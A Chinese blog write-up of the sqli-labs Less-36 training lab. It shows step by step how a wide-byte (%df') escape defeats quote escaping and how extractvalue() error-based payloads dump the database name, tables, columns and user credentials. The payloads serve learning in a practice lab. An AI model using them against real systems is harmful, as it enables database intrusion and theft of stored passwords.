热门标签 | HotTags
当前位置:  开发笔记 > 编程语言 > 正文

sqlilabs/Less36

这一关和上一关一样都是get请求形式的我们首先判断一下注入类型是否为数字型输入如下id1and12正常回显了说明属于字符型然后判断是单引还是双引输入1回显如下不好遇到转义了

这一关和上一关一样都是get请求形式的 

我们首先判断一下注入类型是否为数字型  输入如下

id=1 and 1=2

 正常回显了 说明属于字符型

然后判断是单引还是双引 输入1'

回显如下

 不好 遇到转义了 需要宽字节注入帮助逃逸才行 于是将注入语句改成了1%df'

回显如下

出现报错信息 从报错信息中我们可以知道的是这个注入类型就是单引号注入 我们尝试着佐证一下

输入1%df'--+ 回显如下

正常回显 说明就是单引号注入 开始我们的爆破之旅吧

这一关我们使用报错注入解题

首先爆库 输入如下

id=1%df' and extractvalue(1,concat(0x7e,database(),0x7e))--+

 回显如下

接着进行爆表操作 输入如下

id=1%df' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e))--+

 回显如下

接着进行爆字段操作 输入如下

id=1%df' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name=0x7573657273 and table_schema=database()),0x7e))--+

 回显如下

然后进行爆用户名和密码操作 输入如下

id=1%df' and extractvalue(1,concat(0x7e,(select group_concat(username,password) from users),0x7e))--+

 回显如下

成功解题 嗨嗨!! 


推荐阅读
author-avatar
文女2010_532
这个家伙很懒,什么也没留下!
PHP1.CN | 中国最专业的PHP中文社区 | DevBox开发工具箱 | json解析格式化 |PHP资讯 | PHP教程 | 数据库技术 | 服务器技术 | 前端开发技术 | PHP框架 | 开发工具 | 在线工具
Copyright © 1998 - 2020 PHP1.CN. All Rights Reserved | 京公网安备 11010802041100号 | 京ICP备19059560号-4 | PHP1.CN 第一PHP社区 版权所有